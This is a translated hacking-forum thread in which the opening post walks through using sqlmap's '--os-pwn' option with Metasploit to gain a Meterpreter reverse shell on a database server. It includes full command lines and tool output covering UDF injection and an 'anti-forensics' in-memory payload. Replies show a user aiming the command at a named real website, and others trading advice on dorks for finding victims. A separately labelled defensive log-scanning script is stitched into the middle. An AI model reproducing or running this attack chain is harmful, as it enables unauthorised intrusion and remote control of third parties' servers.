Integrating SQLMAP with METASPLOIT
#1
As a framework, Metasploit is able to integrate with various other tools. As an example, this time I will integrate Metasploit with sqlmap, a vulnerability analysis tool for SQL databases :-bd

For a tutorial on sqlmap, you can see

http://indonesianbacktrack.or.id/forum/s...order=desc

Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://localhost.com/example.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

For now, sorry, I am using dracos linux as the example ... you can adapt it to your own pentest OS

Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://situs-target.com/pagevulner.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

some shit for a walker area ...

Code:
[INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[12:9:13] [INFO] fingerprinting the back-end DBMS operating system
[12:9:15] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[16:10:05] [INFO] testing if current user is DBA
[12:10:15] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[12:10:07] [INFO] checking if UDF 'sys_bineval' already exist
[12:10:08] [INFO] checking if UDF 'sys_exec' already exist
[12:10:10] [INFO] detecting back-end DBMS version from its banner
[12:10:12] [INFO] retrieving MySQL base directory absolute path
[12:10:13] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[12:10:15] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:29] [INFO] creating Metasploit Framework 3 multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [xxx.xxx.xxx.xxx]
which local port number do you want to use? [555]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[12:10:15] [INFO] creation in progress ... done
[12:10:16] [INFO] running Metasploit Framework 3 command line interface locally, please wait..

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12655 updated today (2012.12.06)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 555
LHOST => xxx.xxx.xxx.xxx
[*] Started reverse handler on xxx.xxx.xxx.xxx:555
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval',
please wait..
[*] Sending stage (749056 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:9128 -> xxx.xxx.xxx.xxx:555) at Thu Dec 06

and the meterpreter opens ..
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
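
Added example, not part of the original post and not sqlmap or Metasploit code: a defender-side check that scans MySQL general query log lines for the UDF activity visible in the output above (creation of 'sys_bineval' and 'sys_exec' from a binary UDF file, then a call to one of them). The log line layout, the library file names and the function name `scan_query_log` are assumptions made for illustration; the sample lines are constructed.

```python
import re

# UDF names taken from the sqlmap output quoted in the post above.
KNOWN_UDFS = {"sys_bineval", "sys_exec"}

# MySQL loads a native UDF with: CREATE FUNCTION <name> RETURNS <type> SONAME '<library>'
CREATE_UDF = re.compile(
    r"\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+`?(\w+)`?\s+RETURNS\s+\w+\s+SONAME\s+'([^']+)'",
    re.IGNORECASE,
)
# A call to one of the known UDFs, e.g. SELECT sys_exec(...)
CALL_UDF = re.compile(r"\b(" + "|".join(sorted(KNOWN_UDFS)) + r")\s*\(", re.IGNORECASE)


def scan_query_log(lines):
    """Return (line_no, severity, event, udf_name, library) tuples for UDF activity."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        created = CREATE_UDF.search(line)
        if created:
            name, library = created.group(1).lower(), created.group(2)
            # Any UDF loaded from a shared library deserves review; the names
            # from the post are treated as high severity.
            severity = "high" if name in KNOWN_UDFS else "review"
            findings.append((line_no, severity, "udf_created", name, library))
            continue
        called = CALL_UDF.search(line)
        if called:
            findings.append((line_no, "high", "udf_called", called.group(1).lower(), None))
    return findings


# Constructed sample lines in the style of a MySQL general query log (not from the page).
SAMPLE_LOG = [
    "121206 12:10:05\t   42 Query\tSELECT title FROM events WHERE id=5",
    "121206 12:10:13\t   42 Query\tCREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_constructed.dll'",
    "121206 12:10:15\t   42 Query\tCREATE FUNCTION sys_exec RETURNS int SONAME 'lib_constructed.dll'",
    "121206 12:10:48\t   42 Query\tSELECT sys_exec('<command placeholder>')",
    "121206 12:11:02\t   43 Query\tCREATE FUNCTION metaphon RETURNS STRING SONAME 'udf_example.so'",
]

if __name__ == "__main__":
    for finding in scan_query_log(SAMPLE_LOG):
        print(finding)
```

A web application's database account that lacks the FILE privilege and INSERT on the `mysql` schema cannot perform the UDF creation step this check looks for.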

#2
nice one, bro zee.. here's a thanks from me, hehehe

#3
I don't really understand, bro Sad( Sad(
bro, bro, \m/
I ran this
Quote:./sqlmap.py -u "http://www.schubertensemble.com/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

a question came up like in this image
[Image: 55mgci.png]

and then Msf doesn't come up Undecided

Clound@IBTeam:~#

#4
(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: I don't really understand, bro Sad( Sad(
bro, bro, \m/
I ran this
Quote:./sqlmap.py -u "/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

a question came up like in this image


and then Msf doesn't come up Undecided


It looks like that website document file of yours isn't quite right, clound, :d

#5
(12-06-2012, 05:45 PM)czeroo_cool Wrote:
(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: bro, bro, \m/
I ran this
Quote:./sqlmap.py -u "/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

a question came up like in this image


and then Msf doesn't come up Undecided


It looks like that website document file of yours isn't quite right, clound, :d

hmm, I see :-bd
share a Dork with me please, bro :d :-?

#6
what's missing is that the metasploit path is wrong, bro .. is that really the path?

#7
(12-06-2012, 05:57 PM)zee eichel Wrote: what's missing is that the metasploit path is wrong, bro .. is that really the path?

The folder could just have been changed Big Grin

@Clound ... Just look for ASP dorks, bro..

#8
(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: I don't really understand, bro Sad( Sad(
bro, bro, \m/
I ran this
Quote:./sqlmap.py -u "/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

a question came up like in this image


and then Msf doesn't come up Undecided

that's because your target is linux, and it seems you entered the wrong folder location. you need to know where the victim website's directory is in the filesystem; on linux the default is in "/var/www/"

#9
wow, this is cool, bro..
and if I want to find tables, columns and dump, how do I do it, are the commands still the same as in sqlmap...???
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#10
wkwkw alhamdulillah, learned something new again Big Grin


Smile and Agree, Then Do Whatever The Fvck You Were Gonna Do







